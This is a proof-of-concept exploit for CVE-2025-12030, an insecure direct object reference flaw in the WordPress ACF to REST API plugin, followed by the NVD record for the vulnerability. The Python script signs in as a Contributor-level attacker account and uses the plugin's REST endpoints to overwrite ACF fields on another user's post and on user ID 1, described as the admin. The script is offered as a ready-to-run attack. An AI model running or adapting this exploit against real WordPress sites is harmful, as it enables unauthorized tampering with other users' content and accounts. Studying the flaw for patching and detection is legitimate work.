CVE-2025-12030

import requests import json # CVE-2025-12030 PoC - ACF to REST API IDOR Vulnerability # Target: WordPress site with ACF to REST API plugin <= 3.3.4 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_contributor" # Attacker account with Contributor role PASSWORD = "attacker_password" def get_auth_token(): """Get WordPress REST API authentication token""" auth_url = f"{TARGET_URL}/wp-json/jwt-auth/v1/token" data = { "username": USERNAME, "password": PASSWORD } response = requests.post(auth_url, json=data) if response.status_code == 200: return response.json().get('token') return None def exploit_idor(): """Exploit IDOR vulnerability to modify arbitrary posts""" token = get_auth_token() if not token: print("[-] Authentication failed") return headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Target a post owned by another user (IDOR) target_post_id = 999 # Target post ID to modify exploit_url = f"{TARGET_URL}/wp-json/acf/v3/posts/{target_post_id}" # Malicious ACF field data payload = { "fields": { "malicious_field": "injected_value" } } print(f"[*] Exploiting IDOR on post ID: {target_post_id}") response = requests.post(exploit_url, headers=headers, json=payload) if response.status_code in [200, 201]: print("[+] Successfully modified ACF fields on target post!") print(f"[+] Response: {response.json()}") else: print(f"[-] Exploitation failed: {response.status_code}") print(f"[-] Response: {response.text}") def modify_user_acf(target_user_id): """Modify ACF fields on arbitrary user accounts""" token = get_auth_token() headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } exploit_url = f"{TARGET_URL}/wp-json/acf/v3/users/{target_user_id}" payload = {"fields": {"admin_note": "compromised"}} print(f"[*] Attempting to modify user ID: {target_user_id}") response = requests.post(exploit_url, headers=headers, json=payload) print(f"[*] Status: {response.status_code}") if __name__ == "__main__": exploit_idor() # Modify target user (e.g., admin user ID 1) modify_user_acf(1)

{"cve": {"id": "CVE-2025-12030", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:46.557", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ACF to REST API plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.4. This is due to insufficient capability checks in the update_item_permissions_check() method, which only verifies that the current user has the edit_posts capability without checking object-specific permissions (e.g., edit_post($id), edit_user($id), manage_options). This makes it possible for authenticated attackers, with Contributor-level access and above, to modify ACF fields on posts they do not own, any user account, comments, taxonomy terms, and even the global options page via the /wp-json/acf/v3/{type}/{id} endpoints, granted they can authenticate to the site."}, {"lang": "es", "value": "El plugin ACF to REST API para WordPress es vulnerable a Referencia Directa Insegura a Objeto en todas las versiones hasta la 3.3.4, inclusive. Esto se debe a comprobaciones de capacidad insuficientes en el método update_item_permissions_check(), que solo verifica que el usuario actual tiene la capacidad edit_posts sin verificar permisos específicos del objeto (por ejemplo, edit_post($id), edit_user($id), manage_options). Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, modifiquen campos ACF en publicaciones que no les pertenecen, cualquier cuenta de usuario, comentarios, términos de taxonomía, e incluso la página de opciones globales a través de los endpoints /wp-json/acf/v3/{type}/{id}, siempre que puedan autenticarse en el sitio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/acf-to-rest-api/tags/3.3.4/v3/lib/endpoints/class-acf-to-rest-api-controller.php#L108", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/acf-to-rest-api/tags/3.3.4/v3/lib/endpoints/class-acf-to-rest-api-controller.php#L120", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5ab508fa-298c-48c1-8510-f2e0a881675a?source=cve", "source": "[email protected]"}]}}